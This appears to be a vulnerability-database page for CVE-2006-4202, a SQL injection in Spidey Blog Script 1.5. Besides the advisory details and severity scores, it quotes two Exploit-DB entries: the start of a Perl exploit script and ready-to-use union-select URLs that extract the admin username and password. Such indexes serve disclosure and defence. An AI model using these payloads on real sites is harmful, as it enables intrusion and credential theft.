CVE-2006-4202
published 2006-08-17CVE-2006-4202: SQL injection vulnerability in proje_goster.php in Spidey Blog Script 1.5 and earlier allows remote attackers to execute arbitrary SQL commands via the pid…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.25%
65.7th percentile
SQL injection vulnerability in proje_goster.php in Spidey Blog Script 1.5 and earlier allows remote attackers to execute arbitrary SQL commands via the pid parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| spidey_blog | spidey_blog_script | <= 1.5 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Spidey Blog Script 1.5 - 'proje_goster.asp' SQL Injection (2)
exploitdb·2006-09-24
CVE-2006-4202 Spidey Blog Script 1.5 - 'proje_goster.asp' SQL Injection (2)
Spidey Blog Script 1.5 - 'proje_goster.asp' SQL Injection (2)
---
#!usr/bin/perl
#Author : gega
#Google : "Spidey Blog Script (c) v1.5"
#SpideyBlog 1.5 Sql Injection Exploit
#Author Mail : gega.tr[at]gmail[dot]com
#Powered by e-hack.org
#Vulnerability by Asianeagle.
#Vulnerability Link : http://milw0rm.com/exploits/2186
use LWP::Simple;
print "\n==============================\n";
print "== Spidey Blog v1.5 ==\n";
print "== Sql Injection Exploit ==\n";
print "== Author : gega ==\n";
print "==============================\n\n";
if(!$ARGV[0] or !$ARGV[0]=~/http/ or !$ARGV[1] or ($ARGV[1] ne 'password' and $ARGV[1] ne 'nick'))
{
print "Usage : perl $0 [path] [function]\n";
print "path ==> http://www.example.com/blog/\n";
print "function ==> nick OR password\n";
print "Example : perl $0 ht
Exploit-DB
Spidey Blog Script 1.5 - 'proje_goster.asp' SQL Injection (1)
exploitdb·2006-08-14
CVE-2006-4202 Spidey Blog Script 1.5 - 'proje_goster.asp' SQL Injection (1)
Spidey Blog Script 1.5 - 'proje_goster.asp' SQL Injection (1)
---
###############################################################
#Spidey Blog Script <== 1.5 (tr) SQL Injection Vulnerability #
#Author : ASIANEAGLE #
#Site : www.asianeagle.org #
#Contact: [email protected] #
###############################################################
#Risk : High
#Download Link Of Spidey Blog : http://www.aspindir.com/Kategoriler/ASP/bloglar
#Exploit;
#Admin Nick;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201
#Admin Password;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201
#Greetz: Str0ke
Forever milw0rm ;)
# milw
No writeups or analysis indexed.
http://secunia.com/advisories/21482http://www.securityfocus.com/bid/19518https://exchange.xforce.ibmcloud.com/vulnerabilities/28374https://www.exploit-db.com/exploits/2186http://secunia.com/advisories/21482http://www.securityfocus.com/bid/19518https://exchange.xforce.ibmcloud.com/vulnerabilities/28374https://www.exploit-db.com/exploits/2186
2006-08-17
Published